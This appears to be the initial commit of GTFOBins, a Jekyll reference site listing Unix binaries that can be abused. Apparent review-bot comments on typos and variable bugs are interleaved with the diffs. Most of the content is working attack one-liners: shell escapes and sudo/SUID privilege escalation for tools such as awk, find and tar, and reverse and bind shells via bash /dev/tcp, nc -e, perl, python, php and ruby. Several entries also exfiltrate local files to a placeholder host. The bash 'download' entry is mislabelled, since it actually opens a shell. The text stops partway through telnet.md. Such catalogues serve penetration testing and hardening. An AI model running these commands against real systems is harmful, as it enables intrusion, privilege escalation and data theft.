First commit
commit
b81e57005a
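--- a/.gitignore
+++ b/.gitignore
@@ -0,0 +1,3 @@
+/_tmp/
+/.sass-cache/
+/_site/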
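--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -0,0 +1,3 @@
+# Contributing
+
+TODO link to website URL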
63
Gemfile.lock
Normal file
63
Gemfile.lock
Normal file
@ -0,0 +1,63 @@
|
||||
GEM
|
||||
remote: https://rubygems.org/
|
||||
specs:
|
||||
addressable (2.5.2)
|
||||
public_suffix (>= 2.0.2, < 4.0)
|
||||
colorator (1.1.0)
|
||||
concurrent-ruby (1.0.5)
|
||||
em-websocket (0.5.1)
|
||||
eventmachine (>= 0.12.9)
|
||||
http_parser.rb (~> 0.6.0)
|
||||
eventmachine (1.2.7)
|
||||
ffi (1.9.23)
|
||||
forwardable-extended (2.6.0)
|
||||
http_parser.rb (0.6.0)
|
||||
i18n (0.9.5)
|
||||
concurrent-ruby (~> 1.0)
|
||||
jekyll (3.8.1)
|
||||
addressable (~> 2.4)
|
||||
colorator (~> 1.0)
|
||||
em-websocket (~> 0.5)
|
||||
i18n (~> 0.7)
|
||||
jekyll-sass-converter (~> 1.0)
|
||||
jekyll-watch (~> 2.0)
|
||||
kramdown (~> 1.14)
|
||||
liquid (~> 4.0)
|
||||
mercenary (~> 0.3.3)
|
||||
pathutil (~> 0.9)
|
||||
rouge (>= 1.7, < 4)
|
||||
safe_yaml (~> 1.0)
|
||||
jekyll-sass-converter (1.5.2)
|
||||
sass (~> 3.4)
|
||||
jekyll-watch (2.0.0)
|
||||
listen (~> 3.0)
|
||||
kramdown (1.16.2)
|
||||
liquid (4.0.0)
|
||||
listen (3.1.5)
|
||||
rb-fsevent (~> 0.9, >= 0.9.4)
|
||||
rb-inotify (~> 0.9, >= 0.9.7)
|
||||
ruby_dep (~> 1.2)
|
||||
mercenary (0.3.6)
|
||||
pathutil (0.16.1)
|
||||
forwardable-extended (~> 2.6)
|
||||
public_suffix (3.0.2)
|
||||
rb-fsevent (0.10.3)
|
||||
rb-inotify (0.9.10)
|
||||
ffi (>= 0.5.0, < 2)
|
||||
rouge (3.1.1)
|
||||
ruby_dep (1.5.0)
|
||||
safe_yaml (1.0.4)
|
||||
sass (3.5.6)
|
||||
sass-listen (~> 4.0.0)
|
||||
sass-listen (4.0.0)
|
||||
rb-fsevent (~> 0.9, >= 0.9.4)
|
||||
rb-inotify (~> 0.9, >= 0.9.7)
|
||||
|
||||
PLATFORMS
|
||||
ruby
|
||||
|
||||
DEPENDENCIES
|
||||
jekyll
|
||||
|
||||
BUNDLED WITH
|
||||
1.16.1
|
10
Makefile
Normal file
10
Makefile
Normal file
@ -0,0 +1,10 @@
|
||||
.PHONY: serve bundle
|
||||
|
||||
serve:
|
||||
bundle exec jekyll serve
|
||||
|
||||
serve-public:
|
||||
bundle exec jekyll serve --host 0.0.0.0
|
||||
|
||||
bundle:
|
||||
bundle install
|
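Review bot: `.PHONY: serve bundle` on the first line omits the `serve-public` target, so a file or directory named `serve-public` in the checkout would silently turn `make serve-public` into a no-op; `.PHONY: serve serve-public bundle`. The `serve-public` recipe binds the Jekyll development server to `0.0.0.0`, i.e. every interface of the host, which is presumably intended for previewing from another machine; a comment above the target such as `# binds the dev server on all interfaces; use only on a trusted network` would record that this is deliberate. The recipe lines must be tab-indented, which this rendered page cannot show.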
15
_config.yml
Normal file
15
_config.yml
Normal file
@ -0,0 +1,15 @@
|
||||
title: GTFOBins
|
||||
|
||||
exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md']
|
||||
|
||||
permalink: pretty
|
||||
|
||||
collections:
|
||||
gtfobins:
|
||||
output: true
|
||||
|
||||
defaults:
|
||||
- scope:
|
||||
path: '_gtfobins'
|
||||
values:
|
||||
layout: bin
|
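Review bot: The `exclude` list leaves out `Gemfile.lock`, so Jekyll copies it into `_site/` and the published site exposes the exact dependency versions; `exclude: ['/Gemfile', '/Gemfile.lock', '/Makefile', '/README.md', '/CONTRIBUTING.md']`. The list already excludes `/README.md`, which this commit does not add, so the entry is harmless but currently unused. Indentation is lost on this rendered page, so whether `gtfobins:` and `output: true` nest under `collections:`, and `path:`/`values:` under `scope:`, cannot be verified from here.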
39
_data/functions.yml
Normal file
39
_data/functions.yml
Normal file
@ -0,0 +1,39 @@
|
||||
exec-interactive:
|
||||
label: Interactive
|
||||
description: It executes interactive commands that may be exploited to break out from restricted shells.
|
||||
|
||||
exec-non-interactive:
|
||||
label: Non-interactive
|
||||
description: It executes non-interactive commands that may be exploited to break out from restricted shells.
|
||||
|
||||
suid-enabled:
|
||||
label: SUID
|
||||
description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor.
|
||||
|
||||
suid-limited:
|
||||
label: Limited SUID
|
||||
description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. Its functioning depends on the default operating systems system shell and tipically works only on Debian Linux.
|
||||
|
||||
sudo-enabled:
|
||||
label: Sudo
|
||||
description: It runs in privileged contexts and may be used to escalate or maintain privileges if enabled on `sudo`.
|
||||
|
||||
download:
|
||||
label: Download
|
||||
description: It can download remote files.
|
||||
|
||||
upload:
|
||||
label: Upload
|
||||
description: It can exfiltrate files on the network.
|
||||
|
||||
bind-shell:
|
||||
label: Bind shell
|
||||
description: It can bind a shell to a local port to allow remote network access.
|
||||
|
||||
reverse-shell:
|
||||
label: Reverse shell
|
||||
description: It can send back a reverse shell to a listening attacker to open a remote network access.
|
||||
|
||||
load-library:
|
||||
label: Library load
|
||||
description: It loads shared libraries that may be used to run code in the binary execution context.
|
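Review bot: The `suid-limited` description contains `tipically` and the garbled phrase `default operating systems system shell`; this text is rendered on every binary page through `site.data.functions[...]`, so it should read `Its functioning depends on the default system shell of the operating system and typically works only on Debian Linux.` The `suid-enabled` and `suid-limited` descriptions say `escalate or maintain the privileges`, while `sudo-enabled` says `escalate or maintain privileges`; dropping the article in the first two keeps the three consistent.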
9
_gtfobins/awk.md
Normal file
9
_gtfobins/awk.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh -p")}'
|
||||
suid-limited:
|
||||
- code: ./awk 'BEGIN {system("/bin/sh -p")}'
|
||||
---
|
40
_gtfobins/bash.md
Normal file
40
_gtfobins/bash.md
Normal file
@ -0,0 +1,40 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: bash
|
||||
sudo-enabled:
|
||||
- code: sudo bash
|
||||
suid-enabled:
|
||||
- code: ./bash -p
|
||||
upload:
|
||||
- description: Send local file in the body of an HTTP POST request.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_send
|
||||
echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT
|
||||
- description: Send local file using a TCP connection.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_send
|
||||
cat $LFILE > /dev/tcp/$RHOST/$RPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_get
|
||||
(echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; do read i; done; cat) > $LFILE
|
||||
- description: Fetch remote file using a TCP connection.
|
||||
code: |-
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_get
|
||||
bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1 > $LFILE
|
||||
reverse-shell:
|
||||
- code: |
|
||||
RHOST=127.0.0.1
|
||||
RPORT=8000
|
||||
exec 5<&-;exec 5<>/dev/tcp/$RHOST/$RPORT;while read line 0<&5; do $line 2>&5 >&5; done
|
||||
---
|
9
_gtfobins/csh.md
Normal file
9
_gtfobins/csh.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: csh
|
||||
sudo-enabled:
|
||||
- code: sudo csh
|
||||
suid-enabled:
|
||||
- code: ./csh -b
|
||||
---
|
15
_gtfobins/curl.md
Normal file
15
_gtfobins/curl.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send local file with an HTTP POST request.
|
||||
code: |
|
||||
URL=http://10.0.0.1/
|
||||
LFILE=file_to_send
|
||||
curl -X POST -d @$file_to_send $URL
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |-
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
curl $URL -o $LFILE
|
||||
---
|
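Review bot: The upload example assigns `LFILE=file_to_send` but the command on the next line reads `@$file_to_send`, a variable that is never set, so the request body is built from an empty name; the line should use the variable the example declares, `curl -X POST -d @$LFILE $URL`. The download block in the same file uses `export` for the same kind of placeholders while the upload block uses plain assignment; either works here, but one style per file is easier to maintain.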
15
_gtfobins/ed.md
Normal file
15
_gtfobins/ed.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
ed
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo ed
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
./ed
|
||||
!/bin/sh -p
|
||||
---
|
9
_gtfobins/emacs.md
Normal file
9
_gtfobins/emacs.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
suid-enabled:
|
||||
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
||||
---
|
9
_gtfobins/env.md
Normal file
9
_gtfobins/env.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: env /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo env /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./env /bin/sh -p
|
||||
---
|
9
_gtfobins/expect.md
Normal file
9
_gtfobins/expect.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: expect -c 'spawn /bin/sh;interact'
|
||||
sudo-enabled:
|
||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||
suid-enabled:
|
||||
- code: ./expect -c 'spawn /bin/sh -p;interact'
|
||||
---
|
9
_gtfobins/find.md
Normal file
9
_gtfobins/find.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: find . -exec /bin/sh \; -quit
|
||||
sudo-enabled:
|
||||
- code: sudo find . -exec /bin/sh \; -quit
|
||||
suid-enabled:
|
||||
- code: ./find . -exec /bin/sh -p \; -quit
|
||||
---
|
23
_gtfobins/ftp.md
Normal file
23
_gtfobins/ftp.md
Normal file
@ -0,0 +1,23 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
ftp
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo ftp
|
||||
!/bin/sh
|
||||
upload:
|
||||
- description: Send local file to a FTP server.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
ftp $RHOST
|
||||
put file_to_send
|
||||
download:
|
||||
- description: Fetch a remote file from a FTP server.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
ftp $RHOST
|
||||
get file_to_get
|
||||
---
|
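Review bot: The descriptions `Send local file to a FTP server.` and `Fetch a remote file from a FTP server.` should use `an FTP server`; the same article error appears in `tftp.md` and, with `a SSH server`, in `scp.md` and `ssh.md`. The `ssh.md` description `Reconnecting may help bypassing restricted shells.` should also read `help bypass`.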
7
_gtfobins/gdb.md
Normal file
7
_gtfobins/gdb.md
Normal file
@ -0,0 +1,7 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: gdb -nx -ex '!sh' -ex quit
|
||||
sudo-enabled:
|
||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||
---
|
9
_gtfobins/ionice.md
Normal file
9
_gtfobins/ionice.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: ionice /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo ionice /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./ionice /bin/sh -p
|
||||
---
|
10
_gtfobins/ld.so.md
Normal file
10
_gtfobins/ld.so.md
Normal file
@ -0,0 +1,10 @@
|
||||
---
|
||||
description: Ld.so is the Linux dynamic linker/loader. Its file name and location might change between Linux versions.
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: /lib/ld.so /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo /lib/ld.so /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./ld.so /bin/sh -p
|
||||
---
|
18
_gtfobins/less.md
Normal file
18
_gtfobins/less.md
Normal file
@ -0,0 +1,18 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
less /etc/profile
|
||||
!/bin/sh
|
||||
- code: |
|
||||
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
|
||||
v
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo less /etc/profile
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
./less /etc/profile
|
||||
!/bin/sh -p
|
||||
---
|
15
_gtfobins/man.md
Normal file
15
_gtfobins/man.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
man man
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo man man
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
./man man
|
||||
!/bin/sh -p
|
||||
---
|
15
_gtfobins/more.md
Normal file
15
_gtfobins/more.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
TERM= more /etc/profile
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
TERM= sudo -E more /etc/profile
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
TERM= ./more /etc/profile
|
||||
!/bin/sh -p
|
||||
---
|
25
_gtfobins/nc.md
Normal file
25
_gtfobins/nc.md
Normal file
@ -0,0 +1,25 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Serve a file on a TCP port.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_send
|
||||
nc $RHOST $RPORT < "$LFILE"
|
||||
download:
|
||||
- description: Fetch remote file from a remote TCP port.
|
||||
code: |-
|
||||
LPORT=8000
|
||||
LFILE=file_to_get
|
||||
nc -l -p $LPORT > "$LFILE"
|
||||
reverse-shell:
|
||||
- code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
nc -e /bin/sh $RHOST $RPORT
|
||||
bind-shell:
|
||||
- code: |
|
||||
LPORT=8000
|
||||
nc -lp $LPORT -e /bin/sh
|
||||
---
|
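Review bot: The `upload` description `Serve a file on a TCP port.` does not match its code, which connects out to `$RHOST:$RPORT`, and the `download` description `Fetch remote file from a remote TCP port.` sits above code that listens locally on `$LPORT`; since `_layouts/bin.html` prints the description directly above the code, readers see the contradiction. Suggested wording: `Send local file to a remote TCP port.` and `Receive a file on a local TCP port.`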
14
_gtfobins/perl.md
Normal file
14
_gtfobins/perl.md
Normal file
@ -0,0 +1,14 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: perl -e 'exec "/bin/sh";'
|
||||
sudo-enabled:
|
||||
- code: sudo perl -e 'exec "/bin/sh";'
|
||||
suid-enabled:
|
||||
- code: ./perl -e 'exec "/bin/sh";'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=127.0.0.1
|
||||
export RPORT=12346
|
||||
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
---
|
39
_gtfobins/php.md
Normal file
39
_gtfobins/php.md
Normal file
@ -0,0 +1,39 @@
|
||||
---
|
||||
functions:
|
||||
exec-non-interactive:
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r 'system($_ENV["CMD"]);'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r 'passthru($_ENV["CMD"]);'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r 'print(shell_exec($_ENV["CMD"]));'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r '$r=array(); exec($_ENV["CMD"], $r); print(join(\"\\n\",$r));'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r '$h=@popen($_ENV["CMD"],"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open($_ENV["CMD"], $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
LHOST=0.0.0.0
|
||||
LPORT=8888
|
||||
php -S $LHOST:$LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |-
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
php -r '$c=file_get_contents($_ENV["URL"]);file_put_contents($_ENV["LFILE"], $c);'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=127.0.0.1
|
||||
export RPORT=8000
|
||||
php -r '$sock=fsockopen($_ENV["RHOST"],$_ENV["RPORT"]);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
---
|
32
_gtfobins/python2.md
Normal file
32
_gtfobins/python2.md
Normal file
@ -0,0 +1,32 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: python -c 'import os; os.system("/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo python -c 'import os; os.system("/bin/sh")'
|
||||
suid-enabled:
|
||||
- code: ./python -c 'import os; os.system("/bin/sh -p")'
|
||||
upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request.
|
||||
code: |
|
||||
export URL=http://10.0.0.1/
|
||||
export LFILE=file_to_send
|
||||
python -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=8888
|
||||
python -m SimpleHTTPServer $LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |-
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
python -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=127.0.0.1
|
||||
export RPORT=8000
|
||||
python -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
||||
load-library:
|
||||
- code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
||||
---
|
32
_gtfobins/python3.md
Normal file
32
_gtfobins/python3.md
Normal file
@ -0,0 +1,32 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: python3 -c 'import os; os.system("/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
|
||||
suid-enabled:
|
||||
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
|
||||
upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request.
|
||||
code: |
|
||||
export URL=http://10.0.0.1/
|
||||
export LFILE=file_to_send
|
||||
python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
LPORT=8888
|
||||
python3 -m http.server $LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=127.0.0.1
|
||||
export RPORT=8000
|
||||
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
||||
load-library:
|
||||
- code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
||||
---
|
9
_gtfobins/rpm.md
Normal file
9
_gtfobins/rpm.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
suid-enabled:
|
||||
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
---
|
9
_gtfobins/rpmquery.md
Normal file
9
_gtfobins/rpmquery.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
suid-enabled:
|
||||
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
---
|
19
_gtfobins/ruby.md
Normal file
19
_gtfobins/ruby.md
Normal file
@ -0,0 +1,19 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: ruby -e 'exec "/bin/sh"'
|
||||
sudo-enabled:
|
||||
- code: sudo ruby -e 'exec "/bin/sh"'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=10.0.0.1
|
||||
export RPORT=8000
|
||||
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
load-library:
|
||||
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=8888
|
||||
ruby -run -e httpd . -p $LPORT
|
||||
---
|
36
_gtfobins/scp.md
Normal file
36
_gtfobins/scp.md
Normal file
@ -0,0 +1,36 @@
|
||||
---
|
||||
functions:
|
||||
exec-non-interactive:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="touch /tmp/unrestricted"
|
||||
echo "$CMD" > "$TF"
|
||||
chmod +x "$TF"
|
||||
scp -S $TF x y:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="touch /tmp/unrestricted"
|
||||
echo "$CMD" > "$TF"
|
||||
chmod +x "$TF"
|
||||
sudo scp -S $TF x y:
|
||||
suid-limited:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="touch /tmp/unrestricted"
|
||||
echo "$CMD" > "$TF"
|
||||
chmod +x "$TF"
|
||||
./scp -S $TF a b:
|
||||
upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
RPATH=user@10.0.0.1:~/where_to_save
|
||||
LPATH=file_to_send
|
||||
scp $LFILE $RPATH
|
||||
download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
RPATH=user@10.0.0.1:~/file_to_get
|
||||
LFILE=where_to_save
|
||||
scp $RPATH $LFILE
|
||||
---
|
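Review bot: The upload example assigns `LPATH=file_to_send` but the command uses `$LFILE`, which is unset, so the expanded command has a single argument and fails; the assignment should be `LFILE=file_to_send` to match both the command and the download example below it. The `suid-limited` example also uses `./scp -S $TF a b:` where the two examples above use `x y:`; aligning the placeholder names keeps the file uniform.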
9
_gtfobins/setarch.md
Normal file
9
_gtfobins/setarch.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: setarch $(arch) /bin/sh
|
||||
sudo-enabled:
|
||||
- code: setarch $(arch) /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./setarch $(arch) /bin/sh -p
|
||||
---
|
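Review bot: The `sudo-enabled` entry repeats the interactive command `setarch $(arch) /bin/sh` without the `sudo` prefix, unlike every other `sudo-enabled` entry in this commit (for example `taskset.md` and `ionice.md`), so the page would show an example that does not involve sudo at all; `- code: sudo setarch $(arch) /bin/sh`.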
20
_gtfobins/ssh.md
Normal file
20
_gtfobins/ssh.md
Normal file
@ -0,0 +1,20 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- description: Reconnecting may help bypassing restricted shells.
|
||||
code: ssh localhost /bin/bash --noprofile --norc
|
||||
download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
HOST=user@10.0.0.1
|
||||
RPATH=file_to_get
|
||||
LPATH=where_to_save
|
||||
ssh $HOST "cat $RPATH" > $LPATH
|
||||
upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
HOST=user@10.0.0.1
|
||||
RPATH=where_to_save
|
||||
LPATH=file_to_send
|
||||
ssh $HOST "cat > $RPATH" < $LPATH
|
||||
---
|
9
_gtfobins/strace.md
Normal file
9
_gtfobins/strace.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: strace -o /dev/null /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo strace -o /dev/null /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./strace -o /dev/null /bin/sh -p
|
||||
---
|
10
_gtfobins/tar.md
Normal file
10
_gtfobins/tar.md
Normal file
@ -0,0 +1,10 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
suid-limited:
|
||||
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh
|
||||
-p"
|
||||
---
|
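Review bot: The `suid-limited` `code` value is a plain YAML scalar that continues on a second line (`-p"`), so the resulting string depends on plain-scalar line folding joining the two lines with a single space; the indentation of that continuation is not visible on this rendered page, and a continuation that is not indented past the key makes the front matter fail to parse. A block scalar removes the ambiguity: `- code: |-` followed by the whole command on one indented line, which is the form `ed.md` and `man.md` already use.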
9
_gtfobins/taskset.md
Normal file
9
_gtfobins/taskset.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: taskset 1 /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo taskset 1 /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./taskset 1 /bin/sh -p
|
||||
---
|
15
_gtfobins/tclsh.md
Normal file
15
_gtfobins/tclsh.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
tclsh
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo tclsh
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
suid-enabled:
|
||||
- code: |
|
||||
./tclsh
|
||||
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
||||
---
|
34
_gtfobins/telnet.md
Normal file
34
_gtfobins/telnet.md
Normal file
@ -0,0 +1,34 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
RHOST=www.google.com
|
||||
RPORT=80
|
||||
telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
description: MacOS only.
|
||||
reverse-shell:
|
||||
- code: |
|
||||
RHOST=127.0.0.1
|
||||
RPORT=8000
|
||||
TF=$(mktemp)
|
||||
rm $TF
|
||||
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
RHOST=www.google.com
|
||||
RPORT=80
|
||||
sudo telnet $RHOST $RPORT
|
